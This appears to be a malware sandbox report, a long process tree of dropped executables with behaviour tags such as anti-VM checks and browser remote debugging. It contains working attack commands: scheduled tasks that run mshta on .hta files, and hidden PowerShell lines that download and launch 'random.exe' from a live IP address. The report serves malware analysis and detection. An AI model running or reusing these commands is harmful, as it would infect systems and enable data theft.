                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2172,6619677218156771374,14782804910992433036,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2464 /prefetch:2
                                            5⤵
                                              PID:6420
                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2172,6619677218156771374,14782804910992433036,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3420 /prefetch:2
                                              5⤵
                                                PID:6864
                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2172,6619677218156771374,14782804910992433036,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2372 /prefetch:2
                                                5⤵
                                                  PID:5280
                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2172,6619677218156771374,14782804910992433036,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=5104 /prefetch:2
                                                  5⤵
                                                    PID:7376
                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
                                                  4⤵
                                                  • Uses browser remote debugging
                                                  PID:6124
                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffed72b46f8,0x7ffed72b4708,0x7ffed72b4718
                                                    5⤵
                                                      PID:6840
                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1328,18234122477968137010,6134869543259460634,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2076 /prefetch:3
                                                      5⤵
                                                        PID:7016
                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
                                                      4⤵
                                                      • Uses browser remote debugging
                                                      • Enumerates system info in registry
                                                      • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                                                      • Suspicious use of FindShellTrayWindow
                                                      PID:7472
                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffed72b46f8,0x7ffed72b4708,0x7ffed72b4718
                                                        5⤵
                                                        • Checks processor information in registry
                                                        • Enumerates system info in registry
                                                        PID:5832
                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1988,9587810660820303138,12993773762949518609,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1984 /prefetch:2
                                                        5⤵
                                                          PID:7300
                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1988,9587810660820303138,12993773762949518609,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2504 /prefetch:3
                                                          5⤵
                                                            PID:3200
                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1988,9587810660820303138,12993773762949518609,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2996 /prefetch:8
                                                            5⤵
                                                              PID:8064
                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=1988,9587810660820303138,12993773762949518609,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3408 /prefetch:1
                                                              5⤵
                                                              • Uses browser remote debugging
                                                              PID:7012
                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=1988,9587810660820303138,12993773762949518609,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3420 /prefetch:1
                                                              5⤵
                                                              • Uses browser remote debugging
                                                              PID:6360
                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1988,9587810660820303138,12993773762949518609,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2000 /prefetch:2
                                                              5⤵
                                                                PID:7876
                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1988,9587810660820303138,12993773762949518609,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1876 /prefetch:2
                                                                5⤵
                                                                  PID:5696
                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1988,9587810660820303138,12993773762949518609,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2516 /prefetch:2
                                                                  5⤵
                                                                    PID:5060
                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1988,9587810660820303138,12993773762949518609,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=4916 /prefetch:2
                                                                    5⤵
                                                                      PID:8176
                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1988,9587810660820303138,12993773762949518609,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=4816 /prefetch:2
                                                                      5⤵
                                                                        PID:6156
                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1988,9587810660820303138,12993773762949518609,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=2412 /prefetch:2
                                                                        5⤵
                                                                          PID:7364
                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1988,9587810660820303138,12993773762949518609,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=3192 /prefetch:2
                                                                          5⤵
                                                                            PID:5204
                                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1988,9587810660820303138,12993773762949518609,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=3444 /prefetch:2
                                                                            5⤵
                                                                              PID:6080
                                                                        • C:\Users\Admin\AppData\Local\Temp\10128500101\7i2BMnf.exe
                                                                          "C:\Users\Admin\AppData\Local\Temp\10128500101\7i2BMnf.exe"
                                                                          3⤵
                                                                          • Executes dropped EXE
                                                                          • Suspicious use of SetThreadContext
                                                                          • System Location Discovery: System Language Discovery
                                                                          PID:2912
                                                                          • C:\Users\Admin\AppData\Local\Temp\10128500101\7i2BMnf.exe
                                                                            "C:\Users\Admin\AppData\Local\Temp\10128500101\7i2BMnf.exe"
                                                                            4⤵
                                                                            • Executes dropped EXE
                                                                            • System Location Discovery: System Language Discovery
                                                                            PID:2660
                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 2660 -s 940
                                                                              5⤵
                                                                              • Program crash
                                                                              PID:3340
                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 2912 -s 800
                                                                            4⤵
                                                                            • Program crash
                                                                            PID:1844
                                                                        • C:\Users\Admin\AppData\Local\Temp\10128520101\2qv26zF.exe
                                                                          "C:\Users\Admin\AppData\Local\Temp\10128520101\2qv26zF.exe"
                                                                          3⤵
                                                                          • Executes dropped EXE
                                                                          PID:776
                                                                        • C:\Users\Admin\AppData\Local\Temp\10128580101\f72122173b.exe
                                                                          "C:\Users\Admin\AppData\Local\Temp\10128580101\f72122173b.exe"
                                                                          3⤵
                                                                          • Executes dropped EXE
                                                                          • System Location Discovery: System Language Discovery
                                                                          • Suspicious use of FindShellTrayWindow
                                                                          • Suspicious use of SendNotifyMessage
                                                                          PID:5376
                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                            C:\Windows\system32\cmd.exe /c schtasks /create /tn utZ1Oma1hJT /tr "mshta C:\Users\Admin\AppData\Local\Temp\92U6oEfLh.hta" /sc minute /mo 25 /ru "Admin" /f
                                                                            4⤵
                                                                            • System Location Discovery: System Language Discovery
                                                                            PID:5340
                                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                                              schtasks /create /tn utZ1Oma1hJT /tr "mshta C:\Users\Admin\AppData\Local\Temp\92U6oEfLh.hta" /sc minute /mo 25 /ru "Admin" /f
                                                                              5⤵
                                                                              • System Location Discovery: System Language Discovery
                                                                              • Scheduled Task/Job: Scheduled Task
                                                                              PID:5272
                                                                          • C:\Windows\SysWOW64\mshta.exe
                                                                            mshta C:\Users\Admin\AppData\Local\Temp\92U6oEfLh.hta
                                                                            4⤵
                                                                            • Checks computer location settings
                                                                            • System Location Discovery: System Language Discovery
                                                                            PID:5332
                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'IFJVJYJERVVG53R0DOHVFGNB60UWCDJF.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
                                                                              5⤵
                                                                              • Blocklisted process makes network request
                                                                              • Command and Scripting Interpreter: PowerShell
                                                                              • Downloads MZ/PE file
                                                                              • System Location Discovery: System Language Discovery
                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                              PID:1712
                                                                              • C:\Users\Admin\AppData\Local\TempIFJVJYJERVVG53R0DOHVFGNB60UWCDJF.EXE
                                                                                "C:\Users\Admin\AppData\Local\TempIFJVJYJERVVG53R0DOHVFGNB60UWCDJF.EXE"
                                                                                6⤵
                                                                                • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                • Checks BIOS information in registry
                                                                                • Executes dropped EXE
                                                                                • Identifies Wine through registry keys
                                                                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                • System Location Discovery: System Language Discovery
                                                                                PID:5820
                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                          C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\10128590121\am_no.cmd" "
                                                                          3⤵
                                                                          • System Location Discovery: System Language Discovery
                                                                          PID:7032
                                                                          • C:\Windows\SysWOW64\timeout.exe
                                                                            timeout /t 2
                                                                            4⤵
                                                                            • System Location Discovery: System Language Discovery
                                                                            • Delays execution with timeout.exe
                                                                            PID:7152
                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                            C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
                                                                            4⤵
                                                                            • System Location Discovery: System Language Discovery
                                                                            PID:4848
                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                              powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
                                                                              5⤵
                                                                              • Command and Scripting Interpreter: PowerShell
                                                                              • System Location Discovery: System Language Discovery
                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                              PID:5528
                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                            C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
                                                                            4⤵
                                                                            • System Location Discovery: System Language Discovery
                                                                            PID:5260
                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                              powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
                                                                              5⤵
                                                                              • Command and Scripting Interpreter: PowerShell
                                                                              • System Location Discovery: System Language Discovery
                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                              PID:7160
                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                            C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
                                                                            4⤵
                                                                            • System Location Discovery: System Language Discovery
                                                                            PID:6248
                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                              powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
                                                                              5⤵
                                                                              • Command and Scripting Interpreter: PowerShell
                                                                              • System Location Discovery: System Language Discovery
                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                              PID:2348
                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                            schtasks /create /tn "ATwnlmamlZp" /tr "mshta \"C:\Temp\tMsOFw8o1.hta\"" /sc minute /mo 25 /ru "Admin" /f
                                                                            4⤵
                                                                            • System Location Discovery: System Language Discovery
                                                                            • Scheduled Task/Job: Scheduled Task
                                                                            PID:4656
                                                                          • C:\Windows\SysWOW64\mshta.exe
                                                                            mshta "C:\Temp\tMsOFw8o1.hta"
                                                                            4⤵
                                                                            • Checks computer location settings
                                                                            • System Location Discovery: System Language Discovery
                                                                            PID:6648
                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
                                                                              5⤵
                                                                              • Blocklisted process makes network request
                                                                              • Command and Scripting Interpreter: PowerShell
                                                                              • Downloads MZ/PE file
                                                                              • System Location Discovery: System Language Discovery
                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                              PID:8168
                                                                              • C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe
                                                                                "C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"
                                                                                6⤵
                                                                                • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                • Checks BIOS information in registry
                                                                                • Executes dropped EXE
                                                                                • Identifies Wine through registry keys
                                                                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                • System Location Discovery: System Language Discovery
                                                                                PID:6924
                                                                        • C:\Users\Admin\AppData\Local\Temp\10128910101\9jkTUAK.exe
                                                                          "C:\Users\Admin\AppData\Local\Temp\10128910101\9jkTUAK.exe"
                                                                          3⤵
                                                                          • Executes dropped EXE
                                                                          • Suspicious use of SetThreadContext
                                                                          • System Location Discovery: System Language Discovery
                                                                          PID:3568
                                                                          • C:\Users\Admin\AppData\Local\Temp\10128910101\9jkTUAK.exe
                                                                            "C:\Users\Admin\AppData\Local\Temp\10128910101\9jkTUAK.exe"
                                                                            4⤵
                                                                            • Executes dropped EXE
                                                                            • System Location Discovery: System Language Discovery
                                                                            PID:3564
                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 3568 -s 800
                                                                            4⤵
                                                                            • Program crash
                                                                            PID:380
                                                                        • C:\Users\Admin\AppData\Local\Temp\10128980101\eed5a8fada.exe
                                                                          "C:\Users\Admin\AppData\Local\Temp\10128980101\eed5a8fada.exe"
                                                                          3⤵
                                                                          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                          • Checks BIOS information in registry
                                                                          • Executes dropped EXE
                                                                          • Identifies Wine through registry keys
                                                                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                          • Suspicious use of SetThreadContext
                                                                          • System Location Discovery: System Language Discovery
                                                                          PID:1484
                                                                          • C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                            "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
                                                                            4⤵
                                                                              PID:5464
                                                                          • C:\Users\Admin\AppData\Local\Temp\10128990101\82a33a013d.exe
                                                                            "C:\Users\Admin\AppData\Local\Temp\10128990101\82a33a013d.exe"
                                                                            3⤵
                                                                            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                            • Checks BIOS information in registry
                                                                            • Executes dropped EXE
                                                                            • Identifies Wine through registry keys
                                                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                            • System Location Discovery: System Language Discovery
                                                                            PID:6168
                                                                            • C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                              "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
                                                                              4⤵
                                                                                PID:2348
                                                                            • C:\Users\Admin\AppData\Local\Temp\10129000101\80b1859407.exe
                                                                              "C:\Users\Admin\AppData\Local\Temp\10129000101\80b1859407.exe"
                                                                              3⤵
                                                                              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                              • Checks BIOS information in registry
                                                                              • Executes dropped EXE
                                                                              • Identifies Wine through registry keys
                                                                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                              • System Location Discovery: System Language Discovery
                                                                              PID:1616
                                                                            • C:\Users\Admin\AppData\Local\Temp\10129010101\a277cacccc.exe
                                                                              "C:\Users\Admin\AppData\Local\Temp\10129010101\a277cacccc.exe"
                                                                              3⤵
                                                                                PID:6936
                                                                                • C:\Users\Admin\AppData\Local\Temp\10129010101\a277cacccc.exe
                                                                                  "C:\Users\Admin\AppData\Local\Temp\10129010101\a277cacccc.exe"
                                                                                  4⤵
                                                                                    PID:5256
                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 6936 -s 800
                                                                                    4⤵
                                                                                    • Program crash
                                                                                    PID:6288
                                                                                • C:\Users\Admin\AppData\Local\Temp\10129020101\a2d19cefe4.exe
                                                                                  "C:\Users\Admin\AppData\Local\Temp\10129020101\a2d19cefe4.exe"
                                                                                  3⤵
                                                                                    PID:2952
                                                                              • C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
                                                                                C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
                                                                                1⤵
                                                                                • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                • Checks BIOS information in registry
                                                                                • Executes dropped EXE
                                                                                • Identifies Wine through registry keys
                                                                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                PID:3448
                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 4000 -ip 4000
                                                                                1⤵
                                                                                  PID:2348
                                                                                • C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
                                                                                  C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
                                                                                  1⤵
                                                                                  • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                  • Checks BIOS information in registry
                                                                                  • Executes dropped EXE
                                                                                  • Identifies Wine through registry keys
                                                                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                  PID:1920
                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 2912 -ip 2912
                                                                                  1⤵
                                                                                    PID:3388
                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 2660 -ip 2660
                                                                                    1⤵
                                                                                      PID:4308
                                                                                    • C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
                                                                                      "C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
                                                                                      1⤵
                                                                                        PID:3180
                                                                                      • C:\Windows\system32\svchost.exe
                                                                                        C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
                                                                                        1⤵
                                                                                          PID:2968
                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 3568 -ip 3568
                                                                                          1⤵
                                                                                            PID:1372
